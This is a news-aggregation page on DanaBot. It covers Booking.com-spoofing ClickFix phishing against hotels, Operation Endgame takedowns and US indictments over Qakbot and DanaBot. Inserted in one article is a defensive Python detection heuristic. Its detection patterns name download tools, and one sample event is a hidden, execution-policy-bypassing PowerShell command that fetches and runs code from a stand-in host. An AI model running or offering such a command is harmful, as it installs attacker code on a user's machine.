Latest news with #DanaBot


Techday NZ
09-06-2025
- Business
- Techday NZ
ClickFix phishing surge spoofs Booking.com to target hotels
Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, which alone accounted for 47% of the total campaign volume. The phishing emails impersonate Booking.com, directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts that install remote access trojans (RATs) or information-stealing malware.

ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, that inadvertently run a malicious script. The script is commonly delivered through the user's clipboard, typically copied there when the user presses a specific button on the fraudulent site.

Cofense Intelligence's key findings from its active threat reports (ATRs) on these campaigns:
- The campaign has been growing since November 2024, with 47% of total campaign volume coming from March 2025 alone.
- 75% of ATRs with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other notable but rare ClickFix templates spoof Cloudflare Turnstile CAPTCHAs or are styled as cookie consent banners.
- 64% of campaign ATRs delivered RATs, 47% delivered information stealers, and 11% delivered both.
- XWorm RAT is the most commonly observed RAT, present in 53% of campaign ATRs.
- Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most common information stealers.

The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links. Some emails specify that the link will only function on Windows; recipients who open the site on other operating systems receive a message indicating this limitation.

The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from the victim's device. ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run prompt. Sometimes these scripts are obfuscated to look like verification codes, reducing the likelihood that the user will recognise them as harmful. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
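The execution pattern described above (an interpreter launched from the Run prompt with a hidden, downloading, or "verification code"-styled command line) is what a defender can look for in process-creation telemetry. The following is an added example, not code from Cofense or the article: a small scoring heuristic run over constructed records with Sysmon Event ID 1-style fields (parent image, image, command line). The indicator list, weights and threshold are illustrative assumptions, as are all sample events and hostnames.

```python
"""Heuristic detection of ClickFix-style execution from process-creation events.

Added example, not part of the original article. Field names mirror the
Sysmon Event ID 1 layout (ParentImage, Image, CommandLine); the weights and
threshold below are assumptions chosen for illustration, not vendor defaults.
"""
import re
from dataclasses import dataclass, field

# Interpreters that a pasted ClickFix payload typically invokes.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe")

# (name, pattern, weight): command-line traits common to pasted lures.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(indow(style)?)?\s+h(idden)?\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download", re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|net\.webclient)\b", re.I), 3),
    ("exec_bypass", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 2),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I), 3),
    # Lures often append text that makes the command look like a CAPTCHA code.
    ("captcha_lure", re.compile(r"verif|captcha|not a robot", re.I), 2),
]
THRESHOLD = 4  # assumption: tune against your own baseline


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    suspicious: bool
    score: int
    reasons: list = field(default_factory=list)


def score_event(ev: ProcessEvent) -> Verdict:
    """Return a Verdict for one process-creation event."""
    verdict = Verdict(False, 0)
    image = ev.image.lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return verdict  # only script/host interpreters are of interest here
    # The Run prompt and a user-opened shell both show explorer.exe as parent,
    # which is why this alone is not enough to flag.
    if ev.parent_image.lower().endswith("explorer.exe"):
        verdict.score += 2
        verdict.reasons.append("interpreter spawned by explorer.exe")
    for name, pattern, weight in INDICATORS:
        if pattern.search(ev.command_line):
            verdict.score += weight
            verdict.reasons.append(name)
    verdict.suspicious = verdict.score >= THRESHOLD
    return verdict


def detect(events):
    """Return [(event, verdict)] for every event that crosses the threshold."""
    out = []
    for ev in events:
        v = score_event(ev)
        if v.suspicious:
            out.append((ev, v))
    return out


# Constructed sample events (hostnames are reserved .invalid names).
SAMPLE_EVENTS = [
    # 0: user opened PowerShell from the Start menu; benign.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    # 1: pasted ClickFix-style command with a fake verification tail.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -ep bypass -c "iwr http://lure.invalid/x | iex" '
                 '# I am not a robot - reCAPTCHA Verification ID: 8421'),
    # 2: HTA host pointed at a remote "verify" page.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta https://lure.invalid/verify.hta"),
    # 3: scheduled-task script; parent is not explorer, no lure traits.
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    # 4: not an interpreter at all.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev, v in detect(SAMPLE_EVENTS):
        print(f"score={v.score} {ev.command_line[:60]!r} reasons={v.reasons}")
```

The parent-process signal deliberately carries little weight on its own, because a user launching a terminal looks identical at that level; the lure traits in the command line are what separate a pasted payload from ordinary use. A real deployment would feed actual Sysmon or EDR events into `score_event` and review the `reasons` list rather than the score alone.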


Forbes
23-05-2025
- Business
- Forbes
Ransomware Kill Chain Whacked As FBI, Secret Service, Europol Attack
Operation Endgame strikes the ransomware access brokers. The ransomware threat suffered a serious, if not fatal, injury this week as multiple law enforcement actions took aim at the global criminal enterprise. Microsoft led the way in taking down large parts of the infrastructure behind the Lumma Stealer network, which was behind the capture and sharing of compromised credentials. This comes after one leading ransomware group, LockBit, was itself hacked. Now Europol, with help from both the Federal Bureau of Investigation and the U.S. Secret Service, has hit at the very heart of the ransomware kill chain by targeting initial access operators. Here's everything you need to know about the latest Operation Endgame success.

'Cybercriminals around the world have suffered a major disruption,' Europol stated after confirming the latest stage of Operation Endgame, which has significantly impacted the ability of ransomware groups, or more accurately their affiliates, to execute their malicious attacks. By dismantling the infrastructure used by seven of the leading initial access malware operators, Operation Endgame hopes to strike a blow against the tools that are used to launch most ransomware attacks. Working alongside the FBI, Secret Service and the Department of Justice in the U.S., as well as other global law enforcement agencies, Europol said in a May 23 statement that it had taken down 300 servers, negated 650 domains and issued international arrest warrants against 20 cybercriminals.

Initial access malware is used to do what it says on the tin: gain initial access to systems and networks so that ransomware affiliates can then compromise the target and infect it with the ransomware itself. While there is a booming industry of initial access brokers, who sell ready-made packages to such affiliates, the availability of such software on a cybercrime-as-a-service basis has seen many bypass the broker and save a bit of money by doing it themselves.

Operation Endgame targeted seven of these initial access malware operations, namely: 'By disabling these entry points,' Europol said, 'investigators have struck at the very start of the cyberattack chain, damaging the entire cybercrime-as-a-service ecosystem.' All seven of the malware operations were successfully neutralised by the strikes.

Selena Larson, a staff threat researcher at Proofpoint, which was also involved in the actions, told me that 'the disruption of DanaBot, as part of the ongoing Operation Endgame effort, is a fantastic win for defenders, and will have an impact on the cybercriminal threat landscape.' Not least, it will likely cause a rethink in tactics by imposing a cost on them in terms of legal jeopardy. 'After last year's Operation Endgame disruption,' Larson concluded, 'the initial access malware associated with the disruption, as well as actors who used the malware, largely disappeared from the email threat landscape.' Let's hope the same happens now and the ransomware threatscape shrinks as a result.


DW
23-05-2025
- DW
Global operation takes down 'dangerous' malware network – DW – 05/23/2025
In a global anti-malware crackdown, authorities from several countries took down more than 300 servers and issued international arrest warrants for 20 suspects.

Some of the world's "most dangerous malware" was disrupted this week in a coordinated international operation, which led to the issuance of 20 arrest warrants, the EU anti-crime bodies Europol and Eurojust said Friday. In an operation involving authorities from Canada, Denmark, France, Germany, the Netherlands, Britain, and the United States, more than 300 servers were taken down, 650 domains were neutralized, and €3.5 million (about $3.9 million) in cryptocurrency was seized. Between Monday and Thursday, the operation enabled the countries involved "to take action against the world's most dangerous malware variants and the perpetrators behind them", said Eurojust, the EU Agency for Criminal Justice Cooperation. "Thirty-seven suspects were identified and international arrest warrants were obtained against 20 individuals criminally charged," it added.

What malware was targeted?

According to Europol and Eurojust, the software taken down, known as "initial access malware", is used "for initial infection, helping cybercriminals to enter victims' systems unnoticed and load more malware onto their devices, such as ransomware." Malware such as Bumblebee, Lactrodectus, Qakbot, DanaBot, HijackLoader, Trickbot, and WarmCookie were targeted by the measures. "As these variants are at the beginning of the cyberattack chain, disrupting them damages the entire 'cybercrime as a service' ecosystem," the authorities said.

Operation Endgame continues

About 50 of the servers neutralized this week were in Germany, the authorities said. "In Germany, investigations focused particularly on suspicions of organised extortion and membership of a foreign criminal organisation," according to the federal police and the Frankfurt public prosecutor's office in charge of combatting cybercrime. German authorities also obtained international arrest warrants for the 20 people, "most of them Russian nationals", and launched search operations, they added. The crackdown is an extension of Operation Endgame, the largest police operation ever conducted against botnets. A total of €21.2 million was seized during the operation, which began in 2024.

Edited by: Saim Dušan Inayatullah


Yahoo
23-05-2025
- Yahoo
US indicts Russian accused of ransomware attacks
By AJ Vicens (Reuters) - The U.S. Department of Justice on Thursday unsealed charges against a Russian national accused of leading the development and deployment of malicious software that infected thousands of computers over more than a decade. Rustam Rafailevich Gallyamov, 48, of Moscow, led a group of cybercriminals who developed and deployed Qakbot, a name for software that could be used to infect computers with additional malware, such as ransomware, as well as to conscript the computer into a botnet - a group of compromised computers and devices controlled remotely - to be used for additional malicious purposes, according to a DOJ statement. Prosecutors also made public a complaint seeking the forfeiture of more than $24 million in cryptocurrency and traditional funds seized over the course of the investigation, the DOJ said.

The charges of conspiracy and conspiracy to commit wire fraud come a year and a half after an international law enforcement operation disrupted Qakbot infrastructure. Gallyamov continued cybercriminal activities after the disruption, prosecutors said, as recently as January 2025. Gallyamov did not immediately respond to a request for comment. The DOJ statement did not indicate his whereabouts.

Also on Thursday, federal prosecutors in Los Angeles unsealed charges against 16 people accused of developing and deploying the DanaBot malware, which was used to infect more than 300,000 computers worldwide and cause at least $50 million in damage, according to a DOJ statement. The DanaBot charges are part of Operation Endgame, an international law enforcement and private-sector campaign targeting cybercriminal operators and infrastructure around the world. DanaBot emerged in 2018 as malware to steal banking credentials and other information, but evolved to enable wider information stealing and establish access for follow-on activity, according to researchers with Lumen's Black Lotus Labs, who participated in Operation Endgame. DanaBot remained 'highly operational through 2025,' the researchers wrote in a blog post, with roughly 1,000 daily victims across more than 40 countries.


The Star
22-05-2025
- The Star
US indicts Russian accused of ransomware attacks
(Reuters) - The U.S. Department of Justice on Thursday unsealed charges against a Russian national accused of leading the development and deployment of malicious software that infected thousands of computers over more than a decade. Rustam Rafailevich Gallyamov, 48, of Moscow, led a group of cybercriminals who developed and deployed Qakbot, a name for software that could be used to infect computers with additional malware, such as ransomware, as well as to conscript the computer into a botnet - a group of compromised computers and devices controlled remotely - to be used for additional malicious purposes, according to a DOJ statement. Prosecutors also made public a complaint seeking the forfeiture of more than $24 million in cryptocurrency and traditional funds seized over the course of the investigation, the DOJ said.

The charges of conspiracy and conspiracy to commit wire fraud come a year and a half after an international law enforcement operation disrupted Qakbot infrastructure. Gallyamov continued cybercriminal activities after the disruption, prosecutors said, as recently as January 2025. Gallyamov did not immediately respond to a request for comment. The DOJ statement did not indicate his whereabouts.

Also on Thursday, federal prosecutors in Los Angeles unsealed charges against 16 people accused of developing and deploying the DanaBot malware, which was used to infect more than 300,000 computers worldwide and cause at least $50 million in damage, according to a DOJ statement. The DanaBot charges are part of Operation Endgame, an international law enforcement and private-sector campaign targeting cybercriminal operators and infrastructure around the world. DanaBot emerged in 2018 as malware to steal banking credentials and other information, but evolved to enable wider information stealing and establish access for follow-on activity, according to researchers with Lumen's Black Lotus Labs, who participated in Operation Endgame. DanaBot remained 'highly operational through 2025,' the researchers wrote in a blog post, with roughly 1,000 daily victims across more than 40 countries.

(Reporting by AJ Vicens in Detroit; Additional reporting by Anton Zverev in London; Editing by Matthew Lewis)